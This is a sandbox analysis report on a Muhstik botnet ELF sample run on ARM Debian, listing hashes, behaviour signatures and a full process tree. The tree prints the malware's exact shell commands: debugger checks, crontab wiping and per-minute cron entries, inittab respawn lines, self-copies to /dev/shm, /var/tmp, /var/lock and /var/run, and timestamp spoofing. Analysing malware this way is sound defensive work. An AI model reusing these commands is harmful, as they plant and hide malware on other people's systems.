Resubmissions

14-03-2022 13:27

220314-qp8dmafgh6 10

14-03-2022 05:56

220314-gm2nmaffbr 10

Analysis

  • max time kernel
    8255s
  • max time network
    190s
  • platform
    linux_armhf
  • resource
    debian9-armhf-en-20211208
  • submitted
    14-03-2022 05:56

General

  • Target

    0abc01de8962867957bca89f6bd4c10e

  • Size

    1.6MB

  • MD5

    0abc01de8962867957bca89f6bd4c10e

  • SHA1

    a7b49698f0562b887d1c5b96272b50e9e13cba80

  • SHA256

    46389c117c5f41b60e10f965b3674b3b77189b504b0aeb5c2da67adf55a7129f

  • SHA512

    508fec5f009bfe080ce31b510c21cbe22caa83a4b82c44786f08c53ac04e290d10c0efe4f71ac88b33946e6c7fec2665fbc221adf08af5e428f8c1df17777318

Score
10/10

Malware Config

Signatures

  • suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity

    suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity

  • Writes file to system bin folder 1 TTPs 3 IoCs
  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

  • Modifies rc script 1 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

  • Write file to user bin folder 1 TTPs 2 IoCs
  • Reads runtime system information 20 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 5 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • ./0abc01de8962867957bca89f6bd4c10e
    ./0abc01de8962867957bca89f6bd4c10e
    1⤵
    • Modifies rc script
    • Writes file to tmp directory
    PID:358
    • /bin/sh
      sh -c "pidof -x strace > /dev/null"
      2⤵
        PID:359
        • /bin/pidof
          pidof -x strace
          3⤵
            PID:360
        • /bin/sh
          sh -c "pidof -x tcpdump > /dev/null"
          2⤵
            PID:361
            • /bin/pidof
              pidof -x tcpdump
              3⤵
                PID:366
            • /bin/sh
              sh -c "cat /etc/inittab | grep -v \"/tmp/0abc01de8962867957bca89f6bd4c10e\" > /etc/inittab2"
              2⤵
                PID:371
                • /bin/cat
                  cat /etc/inittab
                  3⤵
                    PID:374
                  • /bin/grep
                    grep -v /tmp/0abc01de8962867957bca89f6bd4c10e
                    3⤵
                      PID:376
                  • /bin/sh
                    sh -c "echo \"0:2345:respawn:/tmp/0abc01de8962867957bca89f6bd4c10e\" >> /etc/inittab2"
                    2⤵
                      PID:378
                    • /bin/sh
                      sh -c "cat /etc/inittab2 > /etc/inittab"
                      2⤵
                        PID:382
                        • /bin/cat
                          cat /etc/inittab2
                          3⤵
                            PID:383
                        • /bin/sh
                          sh -c "rm -rf /etc/inittab2"
                          2⤵
                            PID:384
                            • /bin/rm
                              rm -rf /etc/inittab2
                              3⤵
                                PID:385
                            • /bin/sh
                              sh -c "touch -acmr /bin/ls /etc/inittab"
                              2⤵
                                PID:386
                                • /usr/bin/touch
                                  touch -acmr /bin/ls /etc/inittab
                                  3⤵
                                    PID:387
                              • /bin/sh
                                sh -c "crontab -r"
                                1⤵
                                  PID:369
                                  • /usr/bin/crontab
                                    crontab -r
                                    2⤵
                                    • Reads runtime system information
                                    PID:372
                                • /bin/sh
                                  sh -c "crontab -l | grep /tmp/0abc01de8962867957bca89f6bd4c10e | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/0abc01de8962867957bca89f6bd4c10e > /dev/null 2>&1 &\") | crontab -"
                                  1⤵
                                    PID:370
                                    • /usr/bin/crontab
                                      crontab -l
                                      2⤵
                                      • Reads runtime system information
                                      PID:373
                                    • /bin/grep
                                      grep /tmp/0abc01de8962867957bca89f6bd4c10e
                                      2⤵
                                        PID:375
                                      • /bin/grep
                                        grep -v "no cron"
                                        2⤵
                                          PID:377
                                        • /usr/bin/crontab
                                          crontab -
                                          2⤵
                                          • Reads runtime system information
                                          PID:380
                                      • /usr/bin/crontab
                                        crontab -l
                                        1⤵
                                        • Reads runtime system information
                                        PID:381
                                      • /bin/sh
                                        sh -c "cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /dev/shm/0abc01de8962867957bca89f6bd4c10e"
                                        1⤵
                                          PID:390
                                          • /bin/cp
                                            cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /dev/shm/0abc01de8962867957bca89f6bd4c10e
                                            2⤵
                                            • Reads runtime system information
                                            • Writes file to tmp directory
                                            PID:392
                                        • /bin/sh
                                          sh -c "/bin/uname -n"
                                          1⤵
                                            PID:391
                                            • /bin/uname
                                              /bin/uname -n
                                              2⤵
                                                PID:393
                                            • /bin/sh
                                              sh -c "crontab -l | grep /dev/shm/0abc01de8962867957bca89f6bd4c10e | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/0abc01de8962867957bca89f6bd4c10e > /dev/null 2>&1 &\") | crontab -"
                                              1⤵
                                                PID:396
                                                • /usr/bin/crontab
                                                  crontab -l
                                                  2⤵
                                                  • Reads runtime system information
                                                  PID:398
                                                • /bin/grep
                                                  grep /dev/shm/0abc01de8962867957bca89f6bd4c10e
                                                  2⤵
                                                    PID:400
                                                  • /bin/grep
                                                    grep -v "no cron"
                                                    2⤵
                                                      PID:401
                                                    • /usr/bin/crontab
                                                      crontab -
                                                      2⤵
                                                      • Reads runtime system information
                                                      PID:405
                                                  • /bin/sh
                                                    sh -c "cat /etc/inittab | grep -v \"/dev/shm/0abc01de8962867957bca89f6bd4c10e\" > /etc/inittab2"
                                                    1⤵
                                                      PID:395
                                                      • /bin/cat
                                                        cat /etc/inittab
                                                        2⤵
                                                          PID:397
                                                        • /bin/grep
                                                          grep -v /dev/shm/0abc01de8962867957bca89f6bd4c10e
                                                          2⤵
                                                            PID:399
                                                        • /bin/sh
                                                          sh -c "echo \"0:2345:respawn:/dev/shm/0abc01de8962867957bca89f6bd4c10e\" >> /etc/inittab2"
                                                          1⤵
                                                            PID:402
                                                          • /usr/bin/crontab
                                                            crontab -l
                                                            1⤵
                                                            • Reads runtime system information
                                                            PID:404
                                                          • /bin/sh
                                                            sh -c "cat /etc/inittab2 > /etc/inittab"
                                                            1⤵
                                                              PID:406
                                                              • /bin/cat
                                                                cat /etc/inittab2
                                                                2⤵
                                                                  PID:408
                                                              • /bin/sh
                                                                sh -c "rm -rf /etc/inittab2"
                                                                1⤵
                                                                  PID:410
                                                                  • /bin/rm
                                                                    rm -rf /etc/inittab2
                                                                    2⤵
                                                                      PID:411
                                                                  • /bin/sh
                                                                    sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                    1⤵
                                                                      PID:412
                                                                      • /usr/bin/touch
                                                                        touch -acmr /bin/ls /etc/inittab
                                                                        2⤵
                                                                          PID:413
                                                                      • /bin/sh
                                                                        sh -c "cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /var/tmp/0abc01de8962867957bca89f6bd4c10e"
                                                                        1⤵
                                                                          PID:414
                                                                          • /bin/cp
                                                                            cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /var/tmp/0abc01de8962867957bca89f6bd4c10e
                                                                            2⤵
                                                                            • Reads runtime system information
                                                                            • Writes file to tmp directory
                                                                            PID:415
                                                                        • /bin/sh
                                                                          sh -c "cat /etc/inittab | grep -v \"/var/tmp/0abc01de8962867957bca89f6bd4c10e\" > /etc/inittab2"
                                                                          1⤵
                                                                            PID:417
                                                                            • /bin/cat
                                                                              cat /etc/inittab
                                                                              2⤵
                                                                                PID:419
                                                                              • /bin/grep
                                                                                grep -v /var/tmp/0abc01de8962867957bca89f6bd4c10e
                                                                                2⤵
                                                                                  PID:420
                                                                              • /bin/sh
                                                                                sh -c "crontab -l | grep /var/tmp/0abc01de8962867957bca89f6bd4c10e | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/0abc01de8962867957bca89f6bd4c10e > /dev/null 2>&1 &\") | crontab -"
                                                                                1⤵
                                                                                  PID:418
                                                                                  • /usr/bin/crontab
                                                                                    crontab -l
                                                                                    2⤵
                                                                                    • Reads runtime system information
                                                                                    PID:421
                                                                                  • /bin/grep
                                                                                    grep /var/tmp/0abc01de8962867957bca89f6bd4c10e
                                                                                    2⤵
                                                                                      PID:422
                                                                                    • /bin/grep
                                                                                      grep -v "no cron"
                                                                                      2⤵
                                                                                        PID:423
                                                                                      • /usr/bin/crontab
                                                                                        crontab -
                                                                                        2⤵
                                                                                        • Reads runtime system information
                                                                                        PID:427
                                                                                    • /bin/sh
                                                                                      sh -c "echo \"0:2345:respawn:/var/tmp/0abc01de8962867957bca89f6bd4c10e\" >> /etc/inittab2"
                                                                                      1⤵
                                                                                        PID:424
                                                                                      • /bin/sh
                                                                                        sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                        1⤵
                                                                                          PID:425
                                                                                          • /bin/cat
                                                                                            cat /etc/inittab2
                                                                                            2⤵
                                                                                              PID:429
                                                                                          • /usr/bin/crontab
                                                                                            crontab -l
                                                                                            1⤵
                                                                                            • Reads runtime system information
                                                                                            PID:428
                                                                                          • /bin/sh
                                                                                            sh -c "rm -rf /etc/inittab2"
                                                                                            1⤵
                                                                                              PID:430
                                                                                              • /bin/rm
                                                                                                rm -rf /etc/inittab2
                                                                                                2⤵
                                                                                                  PID:431
                                                                                              • /bin/sh
                                                                                                sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                1⤵
                                                                                                  PID:432
                                                                                                  • /usr/bin/touch
                                                                                                    touch -acmr /bin/ls /etc/inittab
                                                                                                    2⤵
                                                                                                      PID:433
                                                                                                  • /bin/sh
                                                                                                    sh -c "cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /var/lock/0abc01de8962867957bca89f6bd4c10e"
                                                                                                    1⤵
                                                                                                      PID:434
                                                                                                      • /bin/cp
                                                                                                        cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /var/lock/0abc01de8962867957bca89f6bd4c10e
                                                                                                        2⤵
                                                                                                        • Reads runtime system information
                                                                                                        • Writes file to tmp directory
                                                                                                        PID:435
                                                                                                    • /bin/sh
                                                                                                      sh -c "crontab -l | grep /var/lock/0abc01de8962867957bca89f6bd4c10e | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/0abc01de8962867957bca89f6bd4c10e > /dev/null 2>&1 &\") | crontab -"
                                                                                                      1⤵
                                                                                                        PID:438
                                                                                                        • /usr/bin/crontab
                                                                                                          crontab -l
                                                                                                          2⤵
                                                                                                          • Reads runtime system information
                                                                                                          PID:440
                                                                                                        • /bin/grep
                                                                                                          grep /var/lock/0abc01de8962867957bca89f6bd4c10e
                                                                                                          2⤵
                                                                                                            PID:442
                                                                                                          • /bin/grep
                                                                                                            grep -v "no cron"
                                                                                                            2⤵
                                                                                                              PID:443
                                                                                                            • /usr/bin/crontab
                                                                                                              crontab -
                                                                                                              2⤵
                                                                                                              • Reads runtime system information
                                                                                                              PID:446
                                                                                                          • /bin/sh
                                                                                                            sh -c "cat /etc/inittab | grep -v \"/var/lock/0abc01de8962867957bca89f6bd4c10e\" > /etc/inittab2"
                                                                                                            1⤵
                                                                                                              PID:437
                                                                                                              • /bin/cat
                                                                                                                cat /etc/inittab
                                                                                                                2⤵
                                                                                                                  PID:439
                                                                                                                • /bin/grep
                                                                                                                  grep -v /var/lock/0abc01de8962867957bca89f6bd4c10e
                                                                                                                  2⤵
                                                                                                                    PID:441
                                                                                                                • /bin/sh
                                                                                                                  sh -c "echo \"0:2345:respawn:/var/lock/0abc01de8962867957bca89f6bd4c10e\" >> /etc/inittab2"
                                                                                                                  1⤵
                                                                                                                    PID:444
                                                                                                                  • /usr/bin/crontab
                                                                                                                    crontab -l
                                                                                                                    1⤵
                                                                                                                    • Reads runtime system information
                                                                                                                    PID:447
                                                                                                                  • /bin/sh
                                                                                                                    sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                                    1⤵
                                                                                                                      PID:448
                                                                                                                      • /bin/cat
                                                                                                                        cat /etc/inittab2
                                                                                                                        2⤵
                                                                                                                          PID:449
                                                                                                                      • /bin/sh
                                                                                                                        sh -c "rm -rf /etc/inittab2"
                                                                                                                        1⤵
                                                                                                                          PID:450
                                                                                                                          • /bin/rm
                                                                                                                            rm -rf /etc/inittab2
                                                                                                                            2⤵
                                                                                                                              PID:451
                                                                                                                          • /bin/sh
                                                                                                                            sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                            1⤵
                                                                                                                              PID:452
                                                                                                                              • /usr/bin/touch
                                                                                                                                touch -acmr /bin/ls /etc/inittab
                                                                                                                                2⤵
                                                                                                                                  PID:453
                                                                                                                              • /bin/sh
                                                                                                                                sh -c "cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /var/run/0abc01de8962867957bca89f6bd4c10e"
                                                                                                                                1⤵
                                                                                                                                  PID:454
                                                                                                                                  • /bin/cp
                                                                                                                                    cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /var/run/0abc01de8962867957bca89f6bd4c10e
                                                                                                                                    2⤵
                                                                                                                                    • Reads runtime system information
                                                                                                                                    • Writes file to tmp directory
                                                                                                                                    PID:455
                                                                                                                                • /bin/sh
                                                                                                                                  sh -c "crontab -l | grep /var/run/0abc01de8962867957bca89f6bd4c10e | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/0abc01de8962867957bca89f6bd4c10e > /dev/null 2>&1 &\") | crontab -"
                                                                                                                                  1⤵
                                                                                                                                    PID:457
                                                                                                                                    • /usr/bin/crontab
                                                                                                                                      crontab -l
                                                                                                                                      2⤵
                                                                                                                                      • Reads runtime system information
                                                                                                                                      PID:460
                                                                                                                                    • /bin/grep
                                                                                                                                      grep /var/run/0abc01de8962867957bca89f6bd4c10e
                                                                                                                                      2⤵
                                                                                                                                        PID:462
                                                                                                                                      • /bin/grep
                                                                                                                                        grep -v "no cron"
                                                                                                                                        2⤵
                                                                                                                                          PID:463
                                                                                                                                        • /usr/bin/crontab
                                                                                                                                          crontab -
                                                                                                                                          2⤵
                                                                                                                                          • Reads runtime system information
                                                                                                                                          PID:466
                                                                                                                                      • /bin/sh
                                                                                                                                        sh -c "cat /etc/inittab | grep -v \"/var/run/0abc01de8962867957bca89f6bd4c10e\" > /etc/inittab2"
                                                                                                                                        1⤵
                                                                                                                                          PID:458
                                                                                                                                          • /bin/cat
                                                                                                                                            cat /etc/inittab
                                                                                                                                            2⤵
                                                                                                                                              PID:459
                                                                                                                                            • /bin/grep
                                                                                                                                              grep -v /var/run/0abc01de8962867957bca89f6bd4c10e
                                                                                                                                              2⤵
                                                                                                                                                PID:461
                                                                                                                                            • /bin/sh
                                                                                                                                              sh -c "echo \"0:2345:respawn:/var/run/0abc01de8962867957bca89f6bd4c10e\" >> /etc/inittab2"
                                                                                                                                              1⤵
                                                                                                                                                PID:465
                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                crontab -l
                                                                                                                                                1⤵
                                                                                                                                                • Reads runtime system information
                                                                                                                                                PID:467
                                                                                                                                              • /bin/sh
                                                                                                                                                sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                                                                1⤵
                                                                                                                                                  PID:468
                                                                                                                                                  • /bin/cat
                                                                                                                                                    cat /etc/inittab2
                                                                                                                                                    2⤵
                                                                                                                                                      PID:469
                                                                                                                                                  • /bin/sh
                                                                                                                                                    sh -c "rm -rf /etc/inittab2"
                                                                                                                                                    1⤵
                                                                                                                                                      PID:470
                                                                                                                                                      • /bin/rm
                                                                                                                                                        rm -rf /etc/inittab2
                                                                                                                                                        2⤵
                                                                                                                                                          PID:471
                                                                                                                                                      • /bin/sh
                                                                                                                                                        sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                                                        1⤵
                                                                                                                                                          PID:472
                                                                                                                                                          • /usr/bin/touch
                                                                                                                                                            touch -acmr /bin/ls /etc/inittab
                                                                                                                                                            2⤵
                                                                                                                                                              PID:473

                                                                                                                                                          Network

                                                                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                                                                          Replay Monitor

                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                          Downloads